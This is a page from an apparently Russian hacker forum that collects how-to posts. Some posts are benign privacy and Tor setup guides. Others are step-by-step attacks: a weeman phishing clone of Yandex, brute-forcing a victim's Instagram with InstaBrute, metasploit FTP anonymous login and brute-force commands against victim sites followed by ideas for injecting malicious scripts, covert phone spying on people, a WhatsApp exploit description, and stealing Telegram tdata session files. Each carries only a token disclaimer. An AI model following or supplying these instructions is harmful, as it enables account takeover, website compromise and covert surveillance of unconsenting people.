Новости и объявления.
- Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. XAKERSAY.COM
Search the Community
Showing results for tags 'приложение'.
-
Я уверен, что у каждого из вас есть как минимум один старый Аднроид-телефон. И если вы не знаете куда его деть, у меня для вас есть интересное предложение — сделать из него скрытый диктофон и скрытую камеру наблюдения с детектором движения и возможностью записи происходящего. Приложение, которое делает камеру видеонаблюдения из телефона называется Haven, и разница между ним и другими похожими заключается вот в чем: Рекомендовано самим гуру анонимности и приватности Эдвардом Сноуденом, проектом Guardian и Freedom of the Press Foundation.Не хранит записанную информацию на серверах принадлежащих непонятно кому.Имеет открытый код и доступен для скачивания, который я предполагаю скоро подвергнут аудиту.Установка Haven Перейдите на сайт Google Play, скачайте приложение и запустите.После запуска вас попросят установить пороговые значения для звука и движения, и вам нужно провести некоторое тестирование, чтобы уменьшить ложные срабатывания. При правильной настройке вы исключите постоянные шумы и движения, такие как звук работающего холодильника или появление вашего кота. Также приложение Haven предложит связать ваше устройство путем добавления номера на который будете получать уведомления. Вы не обязаны это делать, но в таком случае все будет сохраняться только локально в память устройства. Haven использует сквозное шифрование для защиты данных. Пользователи, которые хотят еще больше безопасности, могут использовать для этого сеть Tor. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Привет, хочу рассказать в данной статье как андроид устройство легко превращается в мощный инструмент для фишинга. Фишинг – подмена данных, для заполучения личной информации пользователя. Для этого понадобится программа – kali linux-weeman. Сейчас вы подумали, что за хрень, ведь я говорил об андройде. Все верно, первым делом устанавливаем пожалуй лучшую консоль для андроида – termux. Он является одним из лучших эмуляторов линукса. После скачивания открываем его. Для повышения комфорта работы устанавливаем Hacker’s Keyboard. Для подготовки к установке прописываем в termux несколько команд: $ apt update $ apt install Необходимо стабильное интернет-подключение, от этого будет зависеть скорость выполнения операции, после этого прописываем: $ apt install git Как мы видим у нас появляется вопрос, хотите ли вы продолжить? Для согласия пишем букву – y. Переходим к следующей команде: $ apt install python2 Появляется абсолютно такой же вопрос, на него тоже нужно дать согласие. Данная команда устанавливает язык программирования – python, именно он позволяет работать программе weeman. Подготвка к установке завершена, устанавливаем weeman: $ git clone https://github.com/evait-security/weeman Далее прописываем: $ ls Видим содержимое каталогов: После ввода команды не появилось никаких надписей? Вам стоит заново пройтись по предыдущим пунктам, если все работает, переходим дальше: $ cd weeman $ ls Образовались данные файлы, стартуем weeman $ python2 weeman.py Успешная установка, переходим к следующим пунктам. Необходимо вывести консоль, делается при помощи данного кода: $ help Далее устанавливаются определенные настройки, делаю на примере Yandex Вводим несколько строк: $ set url https://yandex.ru $ set port 8080 $ set action_url https://yandex.ru Первая команда необходима для установки адреса сайта, который будет скопирован. Вторая команда нужна для установки порта. Третья строка выбирает адрес, на который будет произведена переадресовка жертвы. Для проверки настроек прописываем этот код: $ show Далее запускаем: $ run Как мы видим все работает, адрес сервера. Копируем данный адрес и прописываем в браузере. Предупреждаю, что вся информация предоставлена лишь для ознакомления, не призываю к действиям. За выполнение подобных схем вы можете понести реальное уголовное наказание, поэтому выполняйте подобные действия лишь на свой страх и риск.
-
- хакерский инструмент
- инструмент
- (and 12 more)
-
Привет хакерам, в данной статье расскажу, как правильно установить и провести настройку Tor’а. Первым пунктом задачи будет настройка расширения NoScript, данные настройки необходимы, если вы собираетесь пользоваться даркнетом, чтобы получить максимальную конфиденциальность от различных структур и взломщиков. Если вам тор нужен для обхода блокировок, то можете пропускать данный пункт и использовать стандартные настройки. Настройка NoScript Создатели браузера Тора добавили в свое творение важнейший плагин NoScript, установлен он изначально, но при скачивании браузера он не настроен. Чтобы провести настройку нажимаем в левом верхнем углу на иконку, далее “Настройка” Перейдя в “Белый список” снимание выделение со строки “Глобальное разрешение скриптов” Настройка скрытых параметров браузера Переходим непосредственно к настройке самого браузера, нам нужно зайти в скрытные настройки. Для этого необходимо в адресной строке прописать “about:config” и переходим на страницу. После под предупреждением нажимаем синюю кнопочку и переходим к следующему пункту. Первым делом нужно изменить загрузку и обработку js. Делается это при помощи изменения строки “javascript.enabled” В появившейся странице появилась строка поиска, там и вводим данным параметр и начинаем поиск. Потом на параметре нажимаем ПКМ и тыкаем на переключить, необходимо сменить true на false Далее ищем параметр “network.http.sendRefererHeader”, меняя его значения с двойки на ноль. Выключение HTTP Referer Ищем такой параметр, как “network.http.sendSecureXsiteReferrer”, меняя его значение на False Теперь в поисковую строку вбиваем extensions.torbutton.saved.sendSecureXSiteReferrer, меняя его значение с единицы на двойку. Это основные настройки, которые помогут улучшить вашу анонимность в брауезере тор. Установив подобные изменения в софт, есть возможность, что некоторые сайты будут отказывать работать. Конечно, можно вернуть все к стандартным настройкам, но рекомендую не делать этого. Надеюсь вам это статья дала полезную информацию и ваши хакерские замыслы будут удачны. Но также не забывайте, статья только для ознакомления и вашей защиты от различных хакерских атак.
-
- тор-браузер
- браузер
- (and 11 more)
-
В данной статье я собираюсь ознакомить людей с небольшим списком программ, позволяющие улучшить анонимность в сети. 1. STZBlaster – данная программа позволит изменить имя компьютера, хостинга, ID-процессора, HDD-volume, Мак адрес и всякое прочее. Софт также позволяет менять в компьютере региональный настройки. Есть лишь одно замечание, смена мак-адреса не всегда стабильна, поэтому на него нельзя положиться. 2. RMOSChange – необходима для изменения HTTP заголовков распространенных браузеров. Вы спросите зачем нужна эта программа и что может выполнять этот софт. Первое, что отмечу – включенные скрипты говорят о том, что информация куда-то отправляется, это версия браузера, язык, операционная система и т.д. Будет весьма странно, что заходя на шелл из России, мы будем иметь зарубежные socks и ssh. Второе – используя зарубежные дедики или впн, то необходимо сменить настройки под IE, который является самым популярным браузером за рубежом. 3. SMAC – софтина подменяет мак адреса сетевой платы. Меняя раз в месяц, вы ничем не рискуете. 4. Privacy Suite Main Menu – помогает закриптовать и спрятать созданный контейнер в файлы расширения jpg и waw. Можно сделать сейф. Главная фишка программы – полное уничтожение файлов. 5. TrueCrypt – необходимость в объяснении отсутствует, лучшая программа позволяющая шифровать информацию. 6. Proxyfier – обычный проксификатор. Можно выборочно соксифицировать любое приложение. 7. OpenVPN GUI – софт необходимый, чтобы подключаться к впн серверам. 8. VPSProxy – фича утилиты – использование залитых гейтов как соксы. А главной особенностью является постоянное изменение входящих и исходящих гейтов. 9. O&O SafeErase – главная программа, которой можно доверить полное удаление файлов. 10. VMware workstation – наиболее распространенная софтина, предназначенная для виртуализации систем. Вы спросите, а зачем она необходима? Тут все легко, при включении различных браузерных скриптов (это небходимо для шеллов) то передается информация не только браузерная, но и компьютерная, то есть операционная система, ип, днс и так далее. Для спасения достаточно лишь поставить виртуалку, купить бэкдор-патч на нее. После этого можете пользоваться необходимым софтом. Если чувствуете что-то не так, то юзаем программу под пунктом 4 и форматируем все данные. Я рассказал вам об о всех программах, которые необходимы каждому, кто собирается заниматься какими-то черными делишками или же просто хочет максимально анонимизироваться.
-
- приложение
- анонимность
- (and 8 more)
-
Расскажу о различных сервисах сканирования, никаких предисловий, сразу к делу. VirusTotal Данный сервис проводит проверку файлов большим количеством антивирусов, сканеров и прочих служб выявляющих темную сторону проверяемого элемента. Абсолютно любой человек имеет право отправить файл на проверку в данный сервис, совершенно бесплатно. VirusTotal имеет несколько способов по отправлению файла, как стандартный метод с помощью веб-интерфейса, загрузкой на рабочий стол, а также расширение для браузера. IPVoid Ресурс является бесплатным, создан был в далеком 2010 году, позиционируя себя проверкой черных списков ИП адресов. Сканирование производится через несколько черных списков. Главной целью данного сервиса является предоставление доступных инструментов, помогающих наладить сетевые неполадки и помочь собрать необходимые данные о ИП адресах. URLVoid Подобно прошлому ресурсу, данный проект был создан в 2010 году для сканирования различных сайтов, прогоняя их через различные рейтинги и механизмы определения репутации, также черных-списков и доменов. Это необходимо чтобы определить потенциально опасный сайт, распространяющий вредоносные программы, либо управляемый мошенниками. Web Inspector Данная служба предназначена для проверки безопасности сайтов. Поможет удалить вирусы и защитит сайт от атак хакеров. URL Query Сервис помогает найти и проанализировать вирусные программы. С помощью данной службы можно получить все данные о работе в браузере, посещении сайтов, а также предоставить развернутую информация для будущего сканирования. Central Ops Сборник нескольких служб, которые могут просканировать различные домены и ИП-адреса и прочие интересные данные, например данные о владельце сайта, DND-сервера и т. д. Network Tools Данный сайт дает возможность обычному пользователю воспользоваться разнообразными методами сканирования, такими как Whois, Ping, сканирование заголовков http, декодирование адресов и т. д. Shodan Данный сервис является некой поисковой системой, с помощью который возможно осуществить поиск различных видов компьютеров, таких как роутеры, сервера и т. д. Можно найти описание данного ресурса как поисков сервисных баннеров, представляющее метаданные, которые получается клиент назад. Узнать можно о ПО различных серверов, поддерживаемые опции, различные сообщения и многие другие фишки, которые присутствуют на сервере.
-
Всем привет. В этой небольшой статье я бы хотел рассказать про одну маленькую особенность такого “прекрасного” сервиса, который носит название temp-mail. Что переводится как временная почта. Итак, наверняка любой из нас любит полазить в интернете и поискать какую-то информацию, но когда мы на нее натыкаемся, то можем обнаружить, что она скрыта и нам нужно зарегистрироваться. Поэтому мы быстренько бежим и регистрируем новую почту. Конечно, можно воспользоваться сервисом temp-mail.org, он сильно облегчит жизнь и не засрет вам вашу личную почту. Но я хочу рассказать об обратной стороне данного почтового сервиса, из-за который я бы крайне не рекомендовал бы его использовать. Опасность данного сервиса Что же, заходим на сайт со своего обычного ИП-адреса и забираем почту: Отлично, теперь можем зарегистрироваться на первом встречном форуме, естественно указывая нашу временную почту и ожидаем письмj Письмо у нас, теперь нам нужно просто удалить данный ящик, чтобы все сообщения были “удалены” Ура! Вся наша информация удалена, и мы остались конфиденциальны. На самом деле, все не так как хотелось бы. Изменим свой ИП-адрес, после чего заходим на тот же сайт и нажимаем “Сменить” Когда введете всю информацию, то есть домен и имя почту, вы сохраняете это все и проверяете что из этого вышло. Видим все сообщения, выводы делайте соответсвующие.
-
Здарова всем, сейчас расскажу и покажу как создать свой onion сайт в сети TOR, располагаться который будет прямо на установленной Kali Linux, никаких хостингов! Но, он будет работать только тогда, когда вы его запустите. Если вы хотите иметь красивый адрес вашего сайта, то начинаем сразу с первого пункта, если это вас не интересует – со второго. Пункт 1 Для работы нам нужна именно старая версия Кали. Для примера я буду использовать 1.0.6 На дальнейших версиях не работала. Найти можно в различных архивах. Нарезаем на болванке или же создаем live usb. Загружаем систему. Ждем подключения сети. После чего за работу возьмется Shallot. Shallot даст вам возможность создавать адреса .onion с определенными настройками. Косок адрес может быть случайным. Для установки делаем следующее. Скачаем Shallot с github Код: wget https://github.com/katmagic/Shallot/archive/master.zip Переходим в директорию Код: cd Shallot-master Дальше Код: ./configure make Производим запуск для примера Код: ./shallot ^name ------------------------------------------------------------------ Found matching domain after 30493976 tries: penistfobso4wxhr.onion ------------------------------------------------------------------ -----BEGIN RSA PRIVATE KEY----- MIICXgIBAAKBgQC+dO6h1GjQD0Hqn2LLBX0kIA9px/CtxV5yxMCjbk773igLvXDu v7N9Kr1FYB+yKuSWL/aCZttLqiqUA4L3cxI5Dgtk3bRKkmZre9qfH9xU9v+RSr5P BQmtp0AMi2wLiZxGggkoqcdIhKC4WWoD1xks0H//f7D+G+rdh4IMOHj7kQIEAPC0 RQKBgAwEVw9kxxu/SIugn3dDXJ2tq8V/uGNMBm02MnhckgvIS6S9wfB60mjy3FG/ SUPCWE/f5pUx8fNb3aPnIg2C5FlSE8hAfzdVBIP5F3S2KacSeCL+DPgCpcM8Tkfh s5AaqHe5Z+cb2pLE/1VXQpnnSQhLuSQFresIMCxnaBjOizzJAkEA4laycqQo2Guu eGkppcdNDRnlI4+bCslp2C4ZOuv8/DaLsQ/UE+RMrhdmJi48bcGBafcQlfewdyvL FpF6cpzjtQJBANdqdFilmRwCi1Ij4Q3dBubjjo5+WzxeZ0A6M6g5HDPFZBuHoXtI LNbSz5ilriQQ8fhKZi1HpwVWhNNLyIB3me0CQCdn1d98SwNP+gIfyvYT5ufxoBfH ElngrkQr4rYhsbCmSorxfen9gxI1hQVy4DsbTfttzSwJmOZ5P/CBG+HPFjUCQQCB gWh+P0wOCUDfkRDXdVd1Tb/7nbPbk8r+VlVgnz7fMNPYzjVkq2DTsRvk8uWTdMwQ bTDrrSiO0Wv5zxmMocT9AkEAkLfNSgZafRVmipGo9Fn78ZqedvZAqfYkwXgoIfrB MEq+FK1D3nyY9QDukbe6uR7k8gTfqTtqiHwIQ5JX7u6v7w== -----END RSA PRIVATE KEY----- Строку “name” заменяется на любое имя, которое захотите. Не забывайте, что чем длиннее слово, тем больше времени понадобится для генерации. Лучше всего не больше 6 символов. Полученные данные нужно сохранить в текстовый документ и сохранить на внешнем носителе. Пункт 2 В терминале вводим по порядку: Код: apt-get install tor apt-get install lighttpd Потом запускаем tor и lighttpd Код: service tor start service lighttpd start Необходимо чтобы они сделали конфигурации, для этого в etc, tor, torrc расскоментируем и привидем к такому виду строчки: Код: HiddenServiceDir /var/lib/tor/hidden_service/ HiddenServicePort 80 127.0.0.1:8080 А ниже впишем вот это: Код: ExcludeNodes {ru}, {ua}, {be} В /var/lib/tor/hidden_service имеется два файла hostname и private_key В первом файле записано имя вашего сайта, а во втором уникальный код. Если пункт 1 не был вами выполнен, то вы должны получить вывод в текстовом документе. Из него нам и нужно вписать необходимые значения. Если вы начинали со 2 пункта, то можете ничего не трогать. К примеру в hostname впишем nameforbso3xx.onion а в private_key: Код: -----BEGIN RSA PRIVATE KEY----- MIICXgIBAAKBgQC+dO6h1GjQD0Hqn2LLBX0kIA9px/CtxV5yxMCjbk773igLvXDu v7N9Kr1FYB+yKuSWL/aCZttLqiqUA4L3cxI5Dgtk3bRKkmZre9qfH9xU9v+RSr5P BQmtp0AMi2wLiZxGggkoqcdIhKC4WWoD1xks0H//f7D+G+rdh4IMOHj7kQIEAPC0 RQKBgAwEVw9kxxu/SIugn3dDXJ2tq8V/uGNMBm02MnhckgvIS6S9wfB60mjy3FG/ SUPCWE/f5pUx8fNb3aPnIg2C5FlSE8hAfzdVBIP5F3S2KacSeCL+DPgCpcM8Tkfh s5AaqHe5Z+cb2pLE/1VXQpnnSQhLuSQFresIMCxnaBjOizzJAkEA4laycqQo2Guu eGkppcdNDRnlI4+bCslp2C4ZOuv8/DaLsQ/UE+RMrhdmJi48bcGBafcQlfewdyvL FpF6cpzjtQJBANdqdFilmRwCi1Ij4Q3dBubjjo5+WzxeZ0A6M6g5HDPFZBuHoXtI LNbSz5ilriQQ8fhKZi1HpwVWhNNLyIB3me0CQCdn1d98SwNP+gIfyvYT5ufxoBfH ElngrkQr4rYhsbCmSorxfen9gxI1hQVy4DsbTfttzSwJmOZ5P/CBG+HPFjUCQQCB gWh+P0wOCUDfkRDXdVd1Tb/7nbPbk8r+VlVgnz7fMNPYzjVkq2DTsRvk8uWTdMwQ bTDrrSiO0Wv5zxmMocT9AkEAkLfNSgZafRVmipGo9Fn78ZqedvZAqfYkwXgoIfrB MEq+FK1D3nyY9QDukbe6uR7k8gTfqTtqiHwIQ5JX7u6v7w== -----END RSA PRIVATE KEY----- В /etc/lighttpd/lighttpd.conf поменяем значения: Код: server.document-root = "/var/www/onion" server.error-handler-404 = "/404.php" server.tag = "Ваше значение" server.port = 8080 $HTTP["remoteip"] !~ "127.0.0.1" { url.access-deny = ( "" ) } server.dir-listing = "disable" Пункт 3 Мы находимся во времена технологий, поэтому использовать движки можно в широких направлениях, в которых необходимы PHP и MySQL, поэтому прямо сейчас мы их добавим. Начнем с установки PHP Код: apt-get install php7.0-cgi Далее в /etc/php/7.0/cgi/php.ini ищем и потом раскомментируем строку: Код: cgi.fix_pathinfo = 1 Теперь в lighttpd нам нужно включить поддержку PHP Код: lighttpd-enable-mod fastcgi lighttpd-enable-mod fastcgi-php Пункт 4 В данном пункте мы установим на наш сайт MySQL, а также модуль PHP позволяющий работать вместе с ним. Код: apt-get install mysql-server php7.0-mysql Изначально MySQL использует для кодировки latin1, хотя многие другие движки работают с UTF-8. Поэтому нам нужно открыть /etc/mysql/my.cnf и добавить в секции [client] и [mysqld] данные строки: Код: [client] default-character-set=utf8 [mysqld] character_set_server=utf8 collation_server=utf8_unicode_ci Пункт 5 В /vat/www/ необходимо создать папку onion. Там мы будем размещать наш сайт. Создаем HTML-страницу для проверки, после чего сохраняем ее под названием index.html Код: Тестовая страница Site Local Тестовая страница. Веб-сервер работает и настроен правильно. Создаем PHP страницу ошибки и сохраняем ее как 404.php Код: 404 Site Local Ошибка 404. Страница не найдена. Произведем перезапуск службы: Код: service tor restart service lighttpd restart service mysql restart Пункт 6 В браузере TOR заходим на наш созданный onion-адрес и сразу замечаем результаты! Было бы неплохо в /root/***/tor-browser_en-US/Browser/TorBrowser/Data/Tor/torrc в самом низу добавить строчку ExcludeNodes {ru}, {ua}, {be} Для запуска сайта вводим строки в терминал: Код: service tor start service lighttpd start service mysql start Установим tor-arm который позволит управлять и вести контроль над трафиком Код: apt-get install arm
-
Всем привет, прямо сейчас я хотел бы немного рассказать о том, как можно взломать чей-то аккаунта в Instagram. Этот способ не является уникальным, даже наоборот, он очень распространен, речь пойдет о BruteForce. Прежде чем начать, вы должны понимать азы и в принципе понимать хоть что-то. BruteForce – способ подборки паролей, заключается в переборки всевозможных комбинаций. GitHub – один из самых крупных сервисов, который служит хостингом ИТ-кампаний и их общего создания проектов. Python – язык программирования, который нацелен на улучшение продуктивности разработчика и понимания кода. Итак, чтобы начать перебирать пароли нам понадобится специальный скрипт, который создан с помощью Python. Установить его можно на любую ОС, он очень легок в освоении. Перейдем к делу. Сначала нам нужно установить на компьютер Python. Понадобится он нам для того, чтобы запустить скрипт. Теперь переходим непосредственно к самому скрипту с GitHub - https://github.com/N3TC4T/InstaBrute/archive/master.zip Распаковываем InstaBrute-Master. Далее нам необходимо создать или же где-то скачать пароли для брута. После этого нам нужно будет заполучить парочку прокси и перенести их в текстовый документ. Теперь открываем консоль, с помощью – cmd и перемещаем туда скачанный скрипт instabrute.py. Далее поставив пробел мы пишем –u (логин жертвы) –w(имя документа с пароялми) –p (документ с прокси) –t (кол-во поток, обычно это 4) –d –v Жмем на клавишу Enter и ожидаем. Если вы везучий человек, то через какое-то время вы сможете обнаружить пароль от необходимого вам аккаунта. Я не призываю к действиям, а хочу лишь обезопасить ваши данные от кражи.
-
Всем привет, в этой статье речь снова пройдет про взлом, однако теперь взламывать мы будем сайты с помощью FTP. Рассказывать о конкретных ресурсах я не собираюсь, так как поиск жертвы лежит на ваших плечах. Безусловно, администраторы сайтов могут быть не такими глупыми и просто закрывают все порты, устанавливают сложные пароли на различные интерфейсы и так далее. Такой сайт взломать станет намного сложнее. Однако, никогда не стоит забывать, что абсолютной защиты не существует. Что-то созданное человеком, им же и взламывается, особенно если учитывать тот факт, что чаще всего администраторы не закрывают порты, не производят привязку по ИП и устанавливают ненадежные пароли. Также не производят обновление программного обеспечение. Этот факт является очень плохим для жертвы, а для нас очень хорошим. Первым делом сканирование портов. Существует множество программ, как автоматизированные сканеры, так и самописные скрипты, если говорить коротко, то их большое множество. Если вы обладаете большим мастерством в хакинге, то можете использовать Kali Linux со встроенными утилитами. Если немного отвлечься, то Kali Linux невероятная операционка, которая позволяет проводить огромное множество манипуляций для взлома. Чтобы сканировать порты я взял программу NMAP Итак, переходим в консоль и записываем следующее: Nmap –p 21 [ип жертвы] Если порт будет открыт, ты мы увидим вот это: По стандарту для подключения по FTP нужен логин и пароль, однако в некоторых случаях можно зайти и анонимно. Чтобы найти этот анонимный вход хакеру нужно воспользоваться metasploit: use auxiliary/scanner/ftp/anonymous set rhosts [ип жертвы] exploit Если в этих строках вы заметили слово READ то можете поздравить себя, так как это значит, что подключится к FTP можно без логина и пароля. Подключаемся к серверу Чтобы осуществить это вы можете использовать любую программу, просто записываем ИП адресс сайта жертву, порт 21 и любой произвольный логин с паролем. Если прошлые пункты прошли успешно, то все должно работать. Итак, а что если совершить анонимный вход невозможно? В таком случае мы опять обращаемся к metasploit и вводим следующий код: use auxiliary/scanner/ftp/ftp_login set rhosts [ip жертвы] set user_file /root/docs/user.txt set pass_file /root/docs/pass.txt set stop_on_success true exploit Да, вы все правильно поняли, мы будем брутить с помощью metasploit’а В текстовых документах user и pass будут сохранятся произвольный логины и пароли пользователей. Их легко найти целыми пачками в интернете, причем не вкладывая ни копейки. Поиски не затянутся, а найти можно паки с более 10 млн записей. Когда вы получили доступ к FTP вы сможете заполучить очень ценные БД, после чего слить их на специальных ресурсах или же вы можете внедрить какой-нибудь вирус. Не будем жестить, поэтому рассмотрим самые стандартные варианты: • Внедрение iframe с вашей партнерской программы размеров в 1 пиксель, за которые вы будете получать деньги. • В каком-либо HTML-файл на сайте установить перенаправление на необходимый вам ресурс. • Установка в какую-либо часть сайта скрипт, который будет запрашивать информацию пользователя. • Также огромное множество других вредоносных кодов. Это все что я хотел рассказать сегодня. Я не призываю никого к действиям, а лишь хочу обезопасить владельцев сайтов, показа как легко обходятся различные защиты.
-
Всем привет, сегодня начать слежку за телефоном не так уж и сложно, из-за того, что система безопасности нынешних смартфонов не так высока и доступ в интернет есть практически у каждого. Чтобы начать следить за телефоном нам может помочь официальная программа от компании Гугл, которая будет обрабатывать данные вашего аккаунта. Данный инструмент работает только на платформе Андроид, а это значит, что абсолютно у каждого там имеется Гугл аккаунт. Как следить за телефоном через интернет? На сегодняшний день я могу выделить лишь две стабильные шпионские программы. А именно: WardenCam и приложение от гугл TrackView. Работают они по схожему принципу. Хочется уточнить, что первая программа имеет небольшое преимущество над второй, ведь данная программа позволит подключить аккаунт Dropbox и на него скачивать все видео со смартфона. Однако имеется и недостаток, ведь данная программа может не работать с некоторыми моделями телефонов. А вот официальная программа от гугл выглядит куда лучше, ведь у нее нет привязки к телефону, и она может подключаться к любым возможным устройствам. С помощью данного инструмента вы сможете не только вести видеозапись на телефона, но и получить полный контроль над смартфоном. А именно получать местонахождение телефона, доступ к галереи, а так же иметь доступ к микрофону. Конечно, по факту это будет является нарушением закона, однако, это можно использовать и для контроля собственного телефона. Допустим, у вас каким-либо образом украдут телефон, вы сразу же сможете найти его местоположение и выйти на преступника. Или же допустим следить за ребенком. А можно пойти другим путем и удобно расположить телефон в квартире и следить за ней. Как следить за человеком через телефон? Первым делом, как ни странно, нам нужно установить данную программу, сделать этому можно с Play Market. Данный инструмент должен быть установлен на тот смартфон, на который вы хотите получить повышенный контроль. Таким устройством может является любой телефон, который имеет при себе встроенную камеру. Данный инструмент можно найти даже для телефонов от Apple и Windows. Все это найти можно на сайте разработчика. Также, чтобы вести контроль нужно иметь одинаковые аккаунты для разных устройств, которые имеют учетные записи в Google. А самым главным фактором для слежки – это постоянный доступ к интернету. Для начала работы следует лишь скачать приложения, зайти в них под необходимым аккаунтом и добавить нужное устройство, после этого вы сможете пользоваться всеми функциями данной программы. Кроме вышеперечисленного вы сможете изменять фильтры сообщений, установить детекторы движения и прочие интересные вещи. Программа проста и легка в использовании, а это значит, что даже неопытный пользователь сможет без труда в ней разобраться. Однако никогда не забывайте, чтобы проводить слежку нужно чтобы оба устройства были активны и имели постоянный доступ в интернет.
- 1 reply
-
- слежка
- удаленный доступ
- (and 11 more)
-
Всем привет, это следующая статейка о взломе мессендежров, но сегодня поговорим о менее анонимном – WhatsApp, а именно, я расскажу, как его можно взломать. Итак, для взлома мессендежра нам будет нужно пройти через несколько этапов, подробнее о них я расскажу дальше. Первым делом взломщику нужно создать вирусный html файл с каким-то рисунком. Клиент данного месседжера сохраняет разрешенные документы в специальной переменной: W [“default”]. DOC_MIMES, в данной переменной хранятся все разрешенный типы Mime, которые использует приложение. Так как документ шифруется и отправляется на сервера мессенджера, то в данную переменную можно вставить новый тип, а именно text/html, это необходимо для обхода ограничений и последующей загрузки вредоносного документа. После того как документ будет добавлен в переменную клиента, он зашифрует данные файла, а потом загрузит его на сервер мессенджера Хочу сказать больше, после того как имя и расширение файла изменится и появится фальшива, то данный вирусный файл станет еще более привлекательным для жертвы Данный пример покажет нам то, как после нажатия на файл можно будет увидеть забавного кота, на самом деле являющийся html5 FileReader. С помощью этого взломщик сможет получить данные из вашего браузера. После просмотра страницы, даже не нажимая и не открывая никаких дополнительных ссылок, хакер сможет заполучить данные жертвы, с помощью этого также перехватить доступ к аккаунту мессенджера. Взломщику достаточно создать JavaScript-функцию, с помощью которой он сможет проверять, поступает ли в бэкэнд новая информация, чтобы вовремя ее заменить. Хакер попадает в аккаунт жертвы и получает доступ над ним. Так как мессенджер запрещает иметь более одной активной учетной записи во время сеанса, то после взлома аккаунта, при Загружаемый вирусный файл, с помощью которого окно клиента начнет застревать, позволит взломщику взять верх над вашей учетной записи без какого-либо сопротивления. Конечно, подключение к записи будет до тех пор, пока пользователь не войдет в свой аккаунт, однако это не приведет к выходу из аккаунта, а это значит, что хакер сможет неограниченное количество раз заходить на ваш аккаунт. Думаю, я помог вам защититься, будьте внимательнее!
-
Всех приветствую, сегодня очень часто подымается тема на счет безопасности Телеграма. Поэтому прямо сейчас я немного расскажу о том, как хитрые взломщики могут украсть все ваши данные из этого мессенджера. Попытки взлома мы будем проводить на версии Телеграма для компьютера. Итак, чтобы нам заполучить данные человека, нам нужно заполучить лишь двумя файлами. А именно: C:\Users\*имя пользователя* \AppData\Roaming\Telegram Desktop\tdata: D877F783D5D3EF8C1 (цифра в конце может изменяться) D877F783D5D3EF8C\map1 (здесь конечная цифра тоже может изменяться) Итак, думаю всем уже стало ясно, что именно с помощью данных файлов проходит авторизация в Телеграме. Способы получения этих файлов Использование своих великолепных навыков социальной инженерии, для того чтобы напрямую от человека получить эти файлы. Как их получить зависит только от вашей фантазии.Получение физического доступа к компьютеру жертвы, после чего не теряя времени скопировать файлы на какой-нибудь носитель.Внедрение стиллера. Как правило уже готовые к эксплуатации стиллеры имеют в своем обширном функционале копирование сессии мессенджера. Отлично, мы использовали один и способов, а может и все сразу и получили необходимые нам файлы, но как же их использовать? Итак, первым делом нам необходимо создать пустую папку и скинуть туда полученные два файла, а также telegram.exe, его можно скопировать из своей папки с месенджером. После этого запускаем данных exe-файл и на этом все, недостающие файлы Телеграм сам скачает из интернета. Однако не стоит забывать о том, что нельзя палиться. Не получится сидеть вместе с жертвой на аккаунте, для этого нужно подбирать время, когда взломанный аккаунт неактивен. Я рассказал вам очень простой способ взлома Телеграма, а примечателен он еще тем, что никакая двухфакторная аутентификация не спасет жертву. Поэтому будьте внимательны и не попадайтесь на такие уловки.
-
Ищем уязвимости на сайте министерства обороны США, используя веб-приложение Jira и ряд других инструментов для анализа уровня безопасности. Во время сбора информации о военных сайтах в рамках Bug Bounty Department of Defense’s (дальше DoD) одним из специалистов было отмечено, что на нескольких из них используется популярное веб-приложение Jira, отслеживающее проблемы программного обеспечения. Позже внимание привлек твит, в котором активно обсуждали эксплуатацию SSRF в Jira. На базе полученных сведений ищем уязвимости и рассказываем, чем именно они опасны. Исследование первого веб-сайта началось с посещения google.com с помощью переменной consumerUri. Благодаря информации из блога Бретта Буэрхауса стало понятно, что любой экземпляр AWS может запрашивать IP и получать информацию, относящуюся к этому AWS, включая информацию об учетной записи, потому сперва было бы уместным проверить имя локального хоста через конечную точку метаданных AWS. При попытке получить учётные данные для их AWS было обнаружено, что на выполнение такой операции недостаточно прав. В этом случае лучшим решением стало прочтение AWS-документации и попытки запросить другие конфиденциальные данные, которые можно было бы извлечь. Нарушать правила DoD Bug Bounty не планировалось: «Ищем уязвимости, чтобы их устранить» — таков мотив. Именно поэтому были немедленно прекращены все тесты и отправлен первый репорт о найденных «брешах» в безопасности. Вскоре после этого репорт приняли. Специалист сообщил участнику команды на hackerone о намерении эксплуатировать уязвимость, чтобы доказать максимальную угрозу для безопасности. После краткой оценки репорта уязвимости присвоили среднюю степень угрозы для безопасности. С разрешения разработчиков и началась работа над максимальной эксплуатацией данного бага. Сперва были просканированы порты, чтобы узнать, есть ли какие-либо протоколы, которые можно вызвать. Протестированными оказались следующие порты: 21, (FTP)22, (SSH)80, (Web)443, (SSL Web)8080, (прокси)Данный перебор выявил различные ошибки, которые могут быть полезны в исследовании сервера и сети. Эта информация также была добавлена в отчетность для hackerone. Анализируя выявленные уязвимости, нельзя было не вспомнить о презентации исследователя Джеймса Кетли Cracking the Lens: Targeting HTTP’s Hidden Attack-Surface, в которой шла речь о возможности получить доступ к интрасети DoD и скрытым внутренним службам, доступным только для внутренних IP или из сервиса DoD. В видеопрезентации речь идет о двух таких веб-сайтах, доступ к которым может быть получен, если IP-адрес злоумышленника поступает с DoD сайта. Проверка обоих веб-сайтов DoD была продолжена, чтобы убедиться, можно ли получить хоть какой-то результат. При запросе URL из упомянутой Кетли статьи на первом испытуемом сайте отобразилось предупреждение USG, в то время как другой веб-сайт не отвечал на этот запрос вообще. В ходе данного теста также обнаружились и другие сервисы интрасети. Благодаря этому и стало возможным получить доступ к NIPRnet — не классифицированной внутренней сети протоколов, которая используется для обработки конфиденциальной информации. Она оказалась слишком чувствительной для работы с Интернета, но все же подтверждение того, что к ней можно получить доступ, уже имелось. Раскрыть внутренние службы и сайты не представляется возможным, так как они являются полностью конфиденциальными. После успешного взаимодействия с первым сайтом настал черед второго. Его оказалось сложно эксплуатировать. Он не выдавал подробных ошибок, как это делал вышеупомянутый ресурс. Тем не менее, после тестирования было обнаружено, что можно узнать о существовании определенных портов внутри локальной сети в зависимости от времени отклика (Blind SSRF). Например: время ответа 22 порта составило 1000 мс, тогда как запрос на 21 порт откликался за 10 000 мс. Кроме того, было непонятно, какие протоколы поддерживаются 